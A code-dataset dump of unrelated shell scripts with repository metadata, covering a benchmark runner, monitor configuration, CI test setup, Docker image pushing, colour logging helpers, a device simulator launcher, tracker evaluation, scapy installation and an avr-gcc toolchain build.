(run_sample_sre_spark) # -- Executes the SRE_experiment_demoSPARK.sh experiment in [BBV2]
cd submodules/bigbenchv2/a-bench_connector/experiments/single-run-experiment/
bash SRE_experiment_demoSPARK.sh run_ex # Contains the implementation of the experiment. Like build,deploy and execution orders.
;;
#----------------------------------------------------------------------------------------[ API - ENV-Ex ]--
(run_by_env_bbv_hive) # -- Uses the ENV- Experiments in [BBV2] for Hive
TEST_QUERIES_TO_CALL=($TEST_QUERIES)
if [ -z "$TEST_QUERIES_TO_CALL" ] ; then
echo "Attention. No queries detected. Check the System-ENV > TEST_QUERIES"
else
echo "ENV-Looper-Experiment is starting now."
for test_query in ${TEST_QUERIES_TO_CALL[@]}; do
echo "Running $test_query"
cd submodules/bigbenchv2/a-bench_connector/experiments/env-run-experiment/
bash ENV_experiment_demoHIVE.sh run_ex $test_query
done
fi
cd -
;;
(run_by_env_bbv_spark) # -- Uses the ENV- Experiments in [BBV2] for SPARk
TEST_QUERIES_TO_CALL=($TEST_QUERIES)
if [ -z "$TEST_QUERIES_TO_CALL" ] ; then
echo "Attention. No queries detected. Check the System-ENV > TEST_QUERIES"
else
echo "ENV-Looper-Experiment is starting now."
for test_query in ${TEST_QUERIES_TO_CALL[@]}; do
echo "Running $test_query"
cd submodules/bigbenchv2/a-bench_connector/experiments/env-run-experiment/
bash ENV_experiment_demoSPARK.sh run_ex $test_query
done
fi
cd -
;;
#------------------------------------------------------------------------------[ Abench-Images ]--
(build_all_dockerimages) # -- Builds all docker-images below
./$0 dev_build_dataserver
./$0 dev_build_bbv_two_modul
;;
(build_dataserver) # -- Builds the basis image of the abench data-server
#builds the data-server componente
cd ./dir_bench/images/influxdb-client/image/ && docker build -t data-server . && \
docker build -t jwgumcz/data-server . && \
cd -
# code to build other componentes belongs here
;;
(build_bbv_two_modul) # -- Builds the basis image of the bbv2-module
#builds the bbv2-modul image
./$0 down_bbv_two
cd submodules/bigbenchv2/a-bench_connector/images/hive
docker build -t jwgumcz/abench_bbv2 .
cd -
;;
#---------------------------------------------------------------------------------------[ DEV ]--
(dev_con) # -- Connects to the bench-driver pod via kubernates-function
kubectl exec -it thadoop-hadoop-bench-driver-0 bash
;;
(dev_code) # -- Executes dev-related code.
docker rmi -f data-server
kubectl delete -f ./dir_bench/images/influxdb-client/kubernetes/deploy_influxdb-client.yaml
kubectl delete -f ./dir_bench/images/influxdb-client/kubernetes/service_influxdb-client.yaml
util_sleep 60
kubectl apply -f ./dir_bench/images/influxdb-client/kubernetes/deploy_influxdb-client.yaml
kubectl create -f ./dir_bench/images/influxdb-client/kubernetes/service_influxdb-client.yaml
util_sleep 60
ipxport_data_client=$(bench_minikube_nodeExportedK8sService_IPxPORT influxdb-client)
;;
(dev_pcc) # -- Executes dev-related code for testing code-snipped's
./$0 dev_code
s_time=$(bench_UTC_TimestampInNanos)
util_sleep 100
e_time=$(bench_UTC_TimestampInNanos)
set -o xtrace
ipxport_data_client=$(bench_minikube_nodeExportedK8sService_IPxPORT influxdb-client)
url="http://$ipxport_data_client/csv-zip?host=monitoring-influxdb&port=8086&dbname=k8s&filename=experi01&fromT=$s_time&toT=$e_time"
data_location="./experi.zip"
echo "Calling the following URl <$url>"
curl "$url" --output $data_location
echo "Data is saved under $data_location"
;;
#--------------------------------------------------------------------------------------------[ Help ]--
(--help) # -- Prints the help and usage message
util_print_help
;;
(*)
util_parameter_unkown $var
echo ""
echo "Execution failed with exit-code 1"
util_print_help
exit 1
;;
esac
done
| true
|
583111899f21d03963ccd95539f728f173fa8610
|
Shell
|
jaanos/misc
|
/ubuntu/desktop/desktop.sh
|
UTF-8
| 4,709
| 3.609375
| 4
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# Configure xrandr for a laptop (LVDS) plus optional external display (VGA).
# Usage: desktop.sh [debug] [startup] [force] [24|22|dual|proj|laptop] [left-offset]
# With no preset argument, the preset is auto-detected from the connected
# display's resolution. (Comments translated from Slovenian.)
#
# laptop panel resolution
LAPW=1440
LAPH=900
# xrandr output names
LVDS=LVDS1
VGA=VGA1
# default option values
DEBUG=""
STARTUP=0
FORCE=0
# consume leading mode flags until the first non-flag argument
while true; do
case "$1" in
debug)
# debug mode: prefix every command with echo instead of running it
DEBUG="echo";;
startup)
# startup mode: extra sleeps and a terminal is launched at the end
STARTUP=1;;
force)
# force mode
FORCE=1;;
*)
break;;
esac
shift
done
# at startup, wait a few seconds first (gives X time to settle)
if [ "$STARTUP" -eq 1 ]; then
eval "$DEBUG sleep 5"
fi
# gather the current display configuration from xrandr
XRANDR=`xrandr`
CONN=`echo "$XRANDR" | egrep "\+| connected"`
CURW=`echo "$XRANDR" | grep "current" | cut -d " " -f 8`
CURH=`echo "$XRANDR" | grep "current" | cut -d " " -f 10 | tr -d ,`
# autodetect preset from the connected display's native resolution
if [ -z "$1" ]; then
if echo "$CONN" | grep "1920x1200" > /dev/null; then
PRESET=24
elif echo "$CONN" | grep "1680x1050" > /dev/null; then
PRESET=22
elif echo "$CONN" | grep "1280x1024" > /dev/null; then
PRESET=dual
else
PRESET=laptop
fi
else
PRESET=$1
fi
# per-preset settings: external resolution, target output, wallpaper
case "$PRESET" in
24)
WIDTH=1920
HEIGHT=1200
OUTPUT=${VGA}
PIC=desktop.bmp
;;
22)
WIDTH=1680
HEIGHT=1050
OUTPUT=${VGA}
PIC=desktop.bmp
;;
dual)
WIDTH=1280
HEIGHT=1024
OUTPUT=${VGA}
PIC=desktop-dual.bmp
;;
proj)
WIDTH=1024
HEIGHT=768
OUTPUT=${VGA}
PIC=desktop-dual.bmp
;;
*)
# laptop-only fallback: use the internal panel, switch VGA off
WIDTH=$LAPW
HEIGHT=$LAPH
OUTPUT=${LVDS}
OFF1=${VGA}
PIC=desktop.bmp
;;
esac
typeset -i TLOFF
WOFF=0
if [ "$OUTPUT" = "${LVDS}" ]; then
# single screen: framebuffer is just the laptop panel
TOTW=$WIDTH
TOTH=$HEIGHT
LOFF=0
# apply the single-screen layout
eval "$DEBUG xrandr --output ${LVDS} --primary --auto --panning ${LAPW}x${LAPH}+${LOFF}+0 --output ${OFF1} --off --fb ${WIDTH}x${HEIGHT}"
# move the panels
#eval "$DEBUG gconftool-2 --type int --set /apps/panel/toplevels/top_panel_screen0/monitor 0"
#eval "$DEBUG gconftool-2 --type int --set /apps/panel/toplevels/panel_0/monitor 0"
else
# dual screen: external on top, laptop panel below; LOFF is the laptop's
# horizontal offset (optionally overridden by $2, clamped to [0, LOFF])
TOTH=$(($HEIGHT+$LAPH))
LOFF=$((${WIDTH}-${LAPW}))
if [ -n "$2" ]; then
TLOFF=$2
if [ ${TLOFF} -ge 0 -a ${TLOFF} -le ${LOFF} ]; then
LOFF=${TLOFF}
fi
fi
if [ ${LOFF} -le 0 ]; then
WOFF=$((-${LOFF}))
LOFF=0
fi
TOTW=$((${WIDTH}+${WOFF}))
# apply the dual-screen layout
eval "$DEBUG xrandr --output ${LVDS} --auto --panning ${LAPW}x${LAPH}+${LOFF}+${HEIGHT} --output ${OUTPUT} --primary --mode ${WIDTH}x${HEIGHT} --panning ${WIDTH}x${HEIGHT}+0+0 --fb ${TOTW}x${TOTH}"
# move the panels
#eval "$DEBUG gconftool-2 --type int --set /apps/panel/toplevels/top_panel_screen0/monitor 1"
#if [ ${WIDTH} -lt ${LAPW} ]; then
# eval "$DEBUG gconftool-2 --type int --set /apps/panel/toplevels/panel_0/monitor 0"
#else
# eval "$DEBUG gconftool-2 --type int --set /apps/panel/toplevels/panel_0/monitor 1"
#fi
fi
# move the bottom panel
#eval "$DEBUG gconftool-2 --type int --set /apps/panel/toplevels/bottom_panel_screen0/monitor 0"
#if [ "$FORCE" -eq 1 -o "$TOTW" -ne "$CURW" -a "$TOTH" -ne "$CURH" ]; then
# restart compiz and gnome-panel if necessary
#eval "$DEBUG eval \"(compiz --replace &) > /dev/null 2> /dev/null\""
#eval "$DEBUG pkill -9 gnome-panel"
#eval "$DEBUG eval \"(gnome-panel &) > /dev/null 2> /dev/null\""
#fi
# reset panel transparency
#eval "$DEBUG gconftool-2 --type int --set /apps/panel/toplevels/bottom_panel_screen0/background/opacity 32767"
#eval "$DEBUG gconftool-2 --type int --set /apps/panel/toplevels/bottom_panel_screen0/background/opacity 32768"
#eval "$DEBUG gconftool-2 --type int --set /apps/panel/toplevels/top_panel_screen0/background/opacity 32767"
#eval "$DEBUG gconftool-2 --type int --set /apps/panel/toplevels/top_panel_screen0/background/opacity 32768"
#eval "$DEBUG gconftool-2 --type int --set /apps/panel/toplevels/panel_0/background/opacity 32767"
#eval "$DEBUG gconftool-2 --type int --set /apps/panel/toplevels/panel_0/background/opacity 32768"
# set the background image
#eval "$DEBUG gconftool-2 --type string --set /desktop/gnome/background/picture_filename /home/${USER}/Slike/${PIC}"
# at startup, launch a terminal on the laptop panel and pin it
if [ "$STARTUP" -eq 1 ]; then
eval "$DEBUG gnome-terminal --geometry=80x24+0+$(($TOTH-$LAPH)) &"
eval "$DEBUG sleep 10"
if [ "$OUTPUT" != "${LVDS}" ]; then
eval "$DEBUG wmctrl -r \"${USER}@${HOSTNAME}: ~\" -b add,maximized_vert,maximized_horz"
fi
eval "$DEBUG wmctrl -r \"${USER}@${HOSTNAME}: ~\" -b add,sticky"
fi
| true
|
e25505728d6268e1c5c8553ece78763676a969c9
|
Shell
|
jonipham/WZanalysis_release21
|
/XAMPPbase/test/test_mc_ttbar_syst.sh
|
UTF-8
| 2,065
| 3.375
| 3
|
[] |
no_license
|
#!/bin/bash
# CI test: set up (or build) AthAnalysis, fetch a DAOD test sample from EOS
# and run runAthena.py over it, failing the job when ntuple production fails.
##############################
# Setup #
##############################
# prepare AthAnalysis or build if not already done so
if [ -f "/xampp/build/${AthAnalysis_PLATFORM}/setup.sh" ]; then
    if [[ -z "${TestArea}" ]]; then
        export TestArea=/xampp/XAMPPbase
    fi
    source "/xampp/build/${AthAnalysis_PLATFORM}/setup.sh"
else
    asetup AthAnalysis,latest,here
    if [ -f "${TestArea}/build/${AthAnalysis_PLATFORM}/setup.sh" ]; then
        source "${TestArea}/build/${AthAnalysis_PLATFORM}/setup.sh"
    else
        mkdir -p "${TestArea}/build" && cd "${TestArea}/build"
        cmake ..
        cmake --build .
        cd .. && source "build/${AthAnalysis_PLATFORM}/setup.sh"
    fi
fi

# definition of folder for storing test results
TESTDIR=test_job_systematics/
TESTFILE="root://eoshome.cern.ch//eos/user/x/xampp/ci/base/DAOD_SUSY1.15084993._000088.pool.root.1"
LOCALCOPY=DxAOD.root
TESTRESULT=processedNtuple.root

##############################
# Process test sample #
##############################
# create directory for results
mkdir -p "${TESTDIR}"
cd "${TESTDIR}"

# get kerberos token
if [ -z "${SERVICE_PASS}" ]; then
    # BUG FIX: plain `echo` does not interpret "\n", so the two-line message
    # came out with a literal backslash-n; -e enables escape interpretation.
    echo -e "You did not set the environment variable SERVICE_PASS.\n\
Please define in the gitlab project settings/CI the secret variables SERVICE_PASS and CERN_USER."
else
    echo "${SERVICE_PASS}" | kinit "${CERN_USER}@CERN.CH"
fi

# copy file with xrdcp to local space
if [ ! -f "${LOCALCOPY}" ]; then
    echo "File not found! Copying it from EOS"
    echo xrdcp "${TESTFILE}" "${LOCALCOPY}"
    xrdcp "${TESTFILE}" "${LOCALCOPY}"
fi

# clean up old job result (-f: no error when it does not exist yet)
rm -f "${TESTRESULT}"

# run job
python "${TestArea}/XAMPPbase/python/runAthena.py" --filesInput "${LOCALCOPY}" --outFile "${TESTRESULT}" --evtMax 10000
###################################################
# Raise error if execution failed #
###################################################
if [ $? -ne 0 ]; then
    printf '%s\n' "Execution of runAthena.py failed" >&2 # write error message to stderr
    exit 1
fi
| true
|
3df9bf4ae0264f0a761dcf6fbd34a29ea95ece90
|
Shell
|
B3nedikt/docker-flutter-android
|
/scripts/replace_version_function.sh
|
UTF-8
| 474
| 3.25
| 3
|
[
"MIT"
] |
permissive
|
#!/usr/bin/env bash

# Bump the Flutter version baked into the Dockerfile and README, commit the
# change, and (re)create a matching git tag on origin.
#
# Arguments:
#   $1 - new Flutter version string (e.g. "v1.12.13")
replace_version() {
    local new_version=$1

    # NOTE: `sed -i ''` is the BSD/macOS form; GNU sed would need plain `-i`.
    sed -i '' "s#ENV FLUTTER_VERSION=\"v.*\"#ENV FLUTTER_VERSION=\"$new_version\"#g" Dockerfile
    sed -i '' "s#gableroux/flutter:.* #gableroux/flutter:$new_version #g" README.md

    git add Dockerfile
    git add README.md
    git commit -m "Set version to $new_version"

    # Recreate the tag. Deletion can fail when the tag does not exist yet,
    # so tolerate failures on *both* the remote and the local delete (the
    # original guarded only the remote one).
    git push --delete origin "$new_version" || true
    git tag -d "$new_version" || true
    git tag "$new_version"
    git push
    git push --tags
}
| true
|
baefd641fd18ccfff97d569dbf33958f48fa1715
|
Shell
|
workjalexanderfox/map-host
|
/lib/common.sh
|
UTF-8
| 1,500
| 3.609375
| 4
|
[] |
no_license
|
#! /bin/bash
# Terminal colour escape codes used by the logging helpers below; exported so
# that sourcing scripts (and their children) can reuse them.
export RED='\033[31m' # used by _error
export YELLOW='\033[33m' # used by _warn
export GREEN='\033[0;32m' # used by _info
export BLUE='\033[36m' # used by _debug
export INDIGO='\033[0;34m' # used by _special
export VIOLET='\033[35m' # used by _log
export NC='\033[0m' # reset ("no colour")
# Terminal width captured once at load time; used by _bookend_ for padding.
COLS=$( tput cols )
# Print the given message in the named colour, e.g. `color RED oops`.
# $1 names one of the exported colour variables above (looked up via
# indirect expansion); the remaining arguments form the message.
color() {
    local code=${!1}
    shift
    echo -e "${code}$*${NC}"
}
# Convenience wrapper ("curried" colour): `red MSG...` == `color RED MSG...`.
red() {
    color RED "$@"
}
# Print $1 repeated $2 times (no trailing newline).
# Rewritten without eval: the old eval/brace-expansion trick treated $1 as a
# printf format string (breaking on '%') and mis-expanded a count of 0
# ({1..0} counts *down*, yielding two copies instead of none).
repl() {
    local count=$2 out="" i
    for (( i = 0; i < count; i++ )); do
        out+="$1"
    done
    printf '%s' "$out"
}
# Build a banner line: "[ MESSAGE ]" padded with '–' out to the terminal
# width (global COLS, captured at load time). Relies on the sibling repl().
# NOTE(review): _d/b_/message/message_chars/diff are not declared local and
# leak into the caller's scope; the pad character is a multi-byte en dash,
# so column count vs. ${#message} character count may disagree — confirm.
_bookend_() {
    _d="[ "
    b_=" ]"
    message="$_d$@$b_"
    message_chars=${#message}
    diff=$(($COLS-$message_chars))
    echo $message$(repl '–' $diff)
}
# ---------------------------------------------------------------------------
# Levelled print helpers. For each level X there are three entry points:
#   _X    - print the arguments in the level's colour
#   _X_   - print a full-width "[ ... ]" banner in the level's colour
#   to_X  - re-colour every line read from stdin (e.g. `cmd | to_X`)
# NOTE(review): `echo $(...)` and `_X $line` are unquoted, so runs of
# whitespace in messages are collapsed and glob characters may expand —
# confirm this is intended before adding quotes.
# NOTE(review): _log_ and _special_ banner only "$1", unlike the other *_
# helpers which pass "$@" — confirm whether that asymmetry is deliberate.
# ---------------------------------------------------------------------------
_error() {
    echo $(color RED "$@")
}
_error_() {
    echo $(_error "$(_bookend_ "$@")")
}
to_error () {
    while read -r line; do _error $line; done
}
_warn() {
    echo $(color YELLOW "$@")
}
_warn_() {
    echo $(_warn "$(_bookend_ "$@")")
}
to_warn () {
    while read -r line; do _warn $line; done
}
_info() {
    echo $(color GREEN "$@")
}
_info_() {
    echo $(_info "$(_bookend_ "$@")")
}
to_info () {
    while read -r line; do _info $line; done
}
_debug() {
    echo $(color BLUE "$@")
}
_debug_() {
    echo $(_debug "$(_bookend_ "$@")")
}
to_debug () {
    while read -r line; do _debug $line; done
}
_log() {
    echo $(color VIOLET "$@")
}
_log_() {
    echo $(_log "$(_bookend_ "$1")")
}
to_log () {
    while read -r line; do _log $line; done
}
_special() {
    echo $(color INDIGO "$@")
}
_special_() {
    echo $(_special "$(_bookend_ "$1")")
}
to_special () {
    while read -r line; do _special $line; done
}
| true
|
c03df92d6835c800a91fe8c84d7f4460b5644eae
|
Shell
|
kevinLee1984/VbirdsLinuxShell
|
/ch13p01.sh
|
UTF-8
| 347
| 3
| 3
|
[] |
no_license
|
#!/bin/bash
# Filename: ch13p01.sh
# Program
#   Print the current user name and the current working directory.
# History
#   2016/02/01  Kevin  First release

# Pin PATH to the standard locations so the script behaves the same way
# regardless of the caller's environment.
PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:~/bin
export PATH

whoami=$(whoami)
dict=$(pwd)
printf '%s\n' "My username is $whoami. " "and I'm in $dict"
| true
|
450141c970a38bfbfbcd51c2f3d274bd0f4c54f3
|
Shell
|
nonameentername/pybullet-android
|
/lib_build/make.sh
|
UTF-8
| 876
| 3.203125
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
# Build the pybullet bridge library: compile bullet.cpp against the bundled
# Bullet 2.75-rc7 static libraries, link a shared library named after the OS
# and pointer width, and copy it into ../bullet/bin.
here=`dirname $0`
system=`uname`
# NOTE(review): this probes the *Python* interpreter's pointer width via
# sys.maxint, which only exists on Python 2 — under Python 3 the command
# fails and $arch ends up empty. Confirm the build hosts still run Python 2.
arch=`python -c "from sys import maxint; print 'x86' if maxint == 0x7fffffff else 'x64'"`
bullet=$here/../bullet-2.75-rc7/src
dynamics=$bullet/BulletDynamics/libBulletDynamics.a
collision=$bullet/BulletCollision/libBulletCollision.a
math=$bullet/LinearMath/libLinearMath.a
# remove artefacts of previous builds, then compile position-independent code
rm -f $here/bullet-*.so $here/bullet-*.dylib $here/bullet.o $here/bullet-*.dll
g++ -I$bullet -c -fPIC $here/bullet.cpp -o $here/bullet.o
if [ $system == "Linux" ]; then
soname="bullet-$arch.so"
echo "Building: $soname"
g++ -shared -Wl,-soname,$soname -o $here/$soname $here/bullet.o $dynamics $collision $math
fi
if [ $system == "Darwin" ]; then
soname="bullet-$arch.dylib"
echo "Building: $soname"
g++ -dynamiclib -o $here/$soname $here/bullet.o $dynamics $collision $math
fi
# NOTE(review): on any OS other than Linux/Darwin $soname is never set and
# this cp fails with an empty source path.
cp $here/$soname $here/../bullet/bin/$soname
| true
|
03b94fc330b9f254cb6f21da6755b93feae226e3
|
Shell
|
OSGP/open-smart-grid-platform
|
/osgp/protocol-adapter-dlms/osgp-protocol-simulator-dlms/simulator/startSmr51DeviceSimulator.sh
|
UTF-8
| 825
| 3.359375
| 3
|
[
"Apache-2.0",
"GPL-3.0-only",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
#!/bin/bash
# SPDX-FileCopyrightText: Contributors to the GXF project
#
# SPDX-License-Identifier: Apache-2.0

# Defaults for the SMR 5.1 device simulator; overridable via -j / -p below.
JARTOSTART=dlms-device-simulator/target/dlms-device-simulator-5.1.0-SNAPSHOT-standalone.jar
PORT=1028
# Print usage information for this launcher and abort with status 1.
usage()
{
    printf '%s\n' \
        "Usage: $0 [OPTIONS]" \
        ' ' \
        'Possible OPTIONS:' \
        ' -j <jar to start> The jar to start' \
        ' -p <port> The port for the device simulator'
    exit 1
}
# Parse options: -h prints usage, -p overrides the port, -j overrides the
# jar. The optstring has no leading ':', so getopts prints its own message
# for invalid options and there is no explicit \? handler here.
while getopts "hj:p:" OPTION
do
case $OPTION in
h)
usage
;;
p)
PORT=$OPTARG
;;
j)
JARTOSTART=$OPTARG
;;
esac
done
# Launch the simulator with SMR 5.1 profiles and one logical device; the
# device identity (kemacode/serial) is derived from the chosen port.
java -jar ${JARTOSTART} --deviceidentification.kemacode=TEST${PORT} --deviceidentification.productionyear=00 --deviceidentification.serialnumber=000000 --spring.profiles.active=default,minimumMemory,smr5,smr51 --port=${PORT} --logicalDeviceIds=1
| true
|
dc8281ce550d272f1ea28e13cec515885d9e5748
|
Shell
|
praful-parmar/steps
|
/scripts/push_img
|
UTF-8
| 249
| 2.53125
| 3
|
[] |
no_license
|
#!/bin/bash
# Tag the locally built image with the current build tag and push it to the
# praful1997 Docker Hub namespace.
#
# Arguments:
#   $1 - Docker Hub password
# Environment:
#   BUILD_TAG - tag of the freshly built local image (set by CI)
IMAGE="test"
pass=$1
echo "loggggginnnnnnnnnning in"
# SECURITY FIX: feed the password over stdin instead of `-p` on argv so it
# does not leak through `ps` output or shell history.
printf '%s' "$pass" | docker login -u praful1997 --password-stdin
echo "taaaaaging"
docker tag "$IMAGE:$BUILD_TAG" "praful1997/$IMAGE:$BUILD_TAG"
echo "pushhhing image"
docker push "praful1997/$IMAGE:$BUILD_TAG"
| true
|
4c7550671267b17b7d831ef4f021d72534a2d042
|
Shell
|
limiao06/DSTC4
|
/bash_scripts/msiip_nsvc_tracker_prob.sh
|
UTF-8
| 1,713
| 2.53125
| 3
|
[] |
no_license
|
# msiip_nsvc_tracker.sh feature iteration
# msiip_nsvc_tracker.sh uB 5
#
# Runs the NSVC tracker on dstc4_dev with the base model for feature $1,
# scores and reports it, then repeats the tracker/score/report round for
# each of the $2 probability-boosted models, appending everything to one log.
set -u
logfile=../output/msiip_out/msiip_nsvc_out/msiip_nsvc_${1}_prob_result.txt
# -f: the plain `rm` errored (noisily) when the log did not exist yet
rm -f "$logfile"
python ../scripts/dstc_thu/msiip_nsvc_tracker.py --dataset dstc4_dev --dataroot ../data --ontology ../scripts/config/ontology_dstc4.json --model_dir "../output/models/NSVC_models/nsvc_${1}_model/" --trackfile "../output/msiip_out/msiip_nsvc_out/msiip_nsvc_${1}_t80_hr.json"
python ../scripts/score.py --dataset dstc4_dev --dataroot ../data/ --trackfile "../output/msiip_out/msiip_nsvc_out/msiip_nsvc_${1}_t80_hr.json" --scorefile "../output/msiip_out/msiip_nsvc_out/msiip_nsvc_${1}_t80_hr.score" --ontology ../scripts/config/ontology_dstc4.json
echo "../output/msiip_out/msiip_nsvc_out/msiip_nsvc_${1}_t80_hr.score" > "$logfile"
python ../scripts/report.py --scorefile "../output/msiip_out/msiip_nsvc_out/msiip_nsvc_${1}_t80_hr.score" >> "$logfile"
# $(( )) replaces the deprecated $[ ] arithmetic form
for it in $(seq 0 $(( ${2} - 1 ))); do
    python ../scripts/dstc_thu/msiip_nsvc_tracker.py --dataset dstc4_dev --dataroot ../data/ --model_dir "../output/models/NSVC_models/nsvc_${1}_model_prob_boost/${it}/" --trackfile "../output/msiip_out/msiip_nsvc_out/msiip_nsvc_${1}_prob_boost${it}_t80_hr.json" --ontology ../scripts/config/ontology_dstc4.json
    python ../scripts/score.py --dataset dstc4_dev --dataroot ../data/ --trackfile "../output/msiip_out/msiip_nsvc_out/msiip_nsvc_${1}_prob_boost${it}_t80_hr.json" --scorefile "../output/msiip_out/msiip_nsvc_out/msiip_nsvc_${1}_prob_boost${it}_t80_hr.score" --ontology ../scripts/config/ontology_dstc4.json
    echo 'boost' "${it}" >> "$logfile"
    python ../scripts/report.py --scorefile "../output/msiip_out/msiip_nsvc_out/msiip_nsvc_${1}_prob_boost${it}_t80_hr.score" >> "$logfile"
done
| true
|
e4651a55615d9f8db60fcca3c48af60421e92fab
|
Shell
|
daratmonkey/Stool
|
/pythonify/scapyify.py
|
UTF-8
| 293
| 2.875
| 3
|
[] |
no_license
|
#!/bin/bash
# Download scapy 2.4.2 and install it (via python3 setup.py) on four fixed
# lab hosts in the 10.40.<id>.0/24 range, where <id> is derived from $UID.
wget https://www.github.com/secdev/scapy/archive/v2.4.2.tar.gz
ID=$((UID - 3000))
for x in 130 235 1 66; do
    host="root@10.40.${ID}.${x}"
    scp -r v2.4.2.tar.gz "${host}:"
    ssh "$host" 'tar -zxvf v2.4.2.tar.gz'
    ssh "$host" 'cd scapy-2.4.2;python3 ./setup.py install'
done
| true
|
f8563520f7890ba7d93d2a09a10a1601dd420bed
|
Shell
|
klausjunker/debian-install
|
/aptitude/jk0aptitude
|
UTF-8
| 632
| 2.75
| 3
|
[] |
no_license
|
#!/bin/bash
#-----------------------------------------------------------------------------
# Install aptitude and enable the contrib/non-free components in
# /etc/apt/sources.list; progress is logged through the jk* helpers, which
# are defined elsewhere in this installer suite.
jklog debianinstall "start: $0 --- "
#-----------------------------------------------------------------------------
jkecho "install aptitude"
jklog debianinstall "0-1: aptitude"
apt-get install aptitude -y
jkecho "aptitude update: main contrib non-free"
# append "contrib non-free" to every source line that currently ends in "main"
sed -i 's/main[ \t]*$/main contrib non-free/g' /etc/apt/sources.list
aptitude update
#-----------------------------------------------------------------------------
jklog debianinstall "ende: $0 --- "
#-----------------------------------------------------------------------------
| true
|
9ba26f5021b1730dc9ac24069cd3acf85e864027
|
Shell
|
SymbIoT-Systems/symbmote
|
/packaging/avr-344-beta/gcc/build.sh
|
UTF-8
| 5,607
| 3.59375
| 4
|
[
"BSD-3-Clause"
] |
permissive
|
#!/bin/bash
#
# Build avr-gcc (Atmel 3.4.4 sources, gcc 4.8.1) with in-tree gmp/mpfr/mpc
# and package it as deb/rpm or install locally.
# Duplicates what is in tools/platforms/msp430/toolchain*
#
# BUILD_ROOT is assumed to be the same directory as the build.sh file.
#
# set TINYOS_ROOT_DIR to the head of the tinyos source tree root.
# used to find default PACKAGES_DIR.
#
#
# Env variables used....
#
# TINYOS_ROOT_DIR head of the tinyos source tree root. Used for base of default repo
# PACKAGES_DIR where packages get stashed. Defaults to $(TINYOS_ROOT_DIR)/packages
# REPO_DEST Where the repository is being built (no default)
# DEB_DEST final home once installed.
# CODENAME which part of the repository to place this build in.
#
# REPO_DEST must contain a conf/distributions file for reprepro to work
# properly. One can be copied from $(TINYOS_ROOT_DIR)/tools/repo/conf.
#

# shared helpers (check_download, setup_package_target, remove, ...)
COMMON_FUNCTIONS_SCRIPT=../../functions-build.sh
source ${COMMON_FUNCTIONS_SCRIPT}

# component versions pinned for this toolchain build
SOURCENAME=gcc
SOURCEVERSION=4.8.1
ATMELVERSION=3.4.4
GMPVERSION=5.0.2
MPFRVERSION=3.0.0
MPCVERSION=0.9

BUILDDIR=build
SOURCEDIRNAME=${SOURCENAME}
# tarball / directory names derived from the versions above
SOURCEFILENAME=avr-${SOURCENAME}-${SOURCEVERSION}.tar.bz2
GMPDIRNAME=gmp-${GMPVERSION}
GMPFILENAME=gmp-${GMPVERSION}.tar.bz2
MPFRDIRNAME=mpfr-${MPFRVERSION}
MPFRFILENAME=mpfr-${MPFRVERSION}.tar.bz2
MPCDIRNAME=mpc-${MPCVERSION}
MPCFILENAME=mpc-${MPCVERSION}.tar.gz

#PACKAGE_RELEASE=1
PREFIX=/usr
MAKE="make -j4"
# Fetch gmp/mpfr/mpc and the Atmel avr-gcc source tarball.
# check_download comes from functions-build.sh; a return status of 1 is
# treated as "file needs downloading" — confirm against that helper.
download()
{
    check_download ${GMPFILENAME}
    if [ "$?" -eq "1" ]; then
        wget https://ftp.gnu.org/gnu/gmp/${GMPFILENAME}
    fi
    check_download ${MPFRFILENAME}
    if [ "$?" -eq "1" ]; then
        wget https://ftp.gnu.org/gnu/mpfr/${MPFRFILENAME}
    fi
    check_download ${MPCFILENAME}
    if [ "$?" -eq "1" ]; then
        wget http://www.multiprecision.org/mpc/download/${MPCFILENAME}
    fi
    check_download ${SOURCEFILENAME}
    if [ "$?" -eq "1" ]; then
        wget http://distribute.atmel.no/tools/opensource/Atmel-AVR-GNU-Toolchain/${ATMELVERSION}/${SOURCEFILENAME}
    fi
}

# Extract all four tarballs, symlink gmp/mpfr/mpc into the gcc tree so gcc's
# configure builds them in-tree, then apply the local bugfix patch.
# NOTE(review): leaves the caller's working directory inside SOURCEDIRNAME;
# the main dispatch compensates with `cd ${BUILD_ROOT}` between steps.
unpack()
{
    tar -xjf ${SOURCEFILENAME}
    tar -xjf ${GMPFILENAME}
    tar -xjf ${MPFRFILENAME}
    tar -xzf ${MPCFILENAME}
    cd ${SOURCEDIRNAME}
    ln -s ../${GMPDIRNAME} gmp
    ln -s ../${MPFRDIRNAME} mpfr
    ln -s ../${MPCDIRNAME} mpc
    patch -p0 <../bugfix60486.patch
}
# Configure and compile avr-gcc inside a subshell (so the cd's do not leak).
# Note: `set -e` is set in the *current* shell here and stays in effect for
# the rest of the script, not just this function.
build()
{
    set -e
    (
    cd ${SOURCEDIRNAME}
    # regenerate the per-MCU option table and multilib makefile fragment
    pushd gcc/config/avr/
    sh genopt.sh avr-mcus.def > avr-tables.opt
    cat avr-mcus.def | awk -f genmultilib.awk FORMAT="Makefile" > t-multilib
    popd
    #don't force old autoconf
    sed -i 's/ \[m4_fatal(\[Please use exactly Autoconf \]/ \[m4_errprintn(\[Please use exactly Autoconf \]/g' ./config/override.m4 || task_error "sed failed"
    autoconf
    mkdir -p ${BUILDDIR}
    cd ${BUILDDIR}
    # out-of-tree configure; size-optimised, no NLS/ssp, DWARF2 debug format
    CFLAGS="-Os -g0 -s" ../configure \
    LDFLAGS="-L${PREFIX}/lib" CPPFLAGS=""\
    --target=avr\
    --prefix=${PREFIX}\
    --libdir=${PREFIX}/lib\
    --libexecdir=${PREFIX}/lib\
    --infodir=${PREFIX}/share/info\
    --mandir=${PREFIX}/share/man\
    --enable-languages="c,c++"\
    --with-dwarf2\
    --enable-doc\
    --disable-libada\
    --disable-libssp\
    --disable-nls\
    --with-ld=${PREFIX}/bin/avr-ld\
    --with-as=${PREFIX}/bin/avr-as\
    --with-avrlibc=yes
    ${MAKE} all
    #../${SOURCEDIRNAME}/configure --prefix=${PREFIX} --disable-libssp --disable-nls --enable-languages=c,c++ --infodir=${PREFIX}/share/info --libdir=${PREFIX}/lib --libexecdir=${PREFIX}/lib --mandir=${PREFIX}/share/man --target=avr --with-ld=/usr/bin/avr-ld --with-as=/usr/bin/avr-as
    #${MAKE}
    )
}

# Install the build into the staging directory (INSTALLDIR, provided by
# setup_package_target / setup_local_target), prune docs and libiberty,
# and strip all installed binaries to shrink the package.
installto()
{
    cd ${SOURCEDIRNAME}/${BUILDDIR}
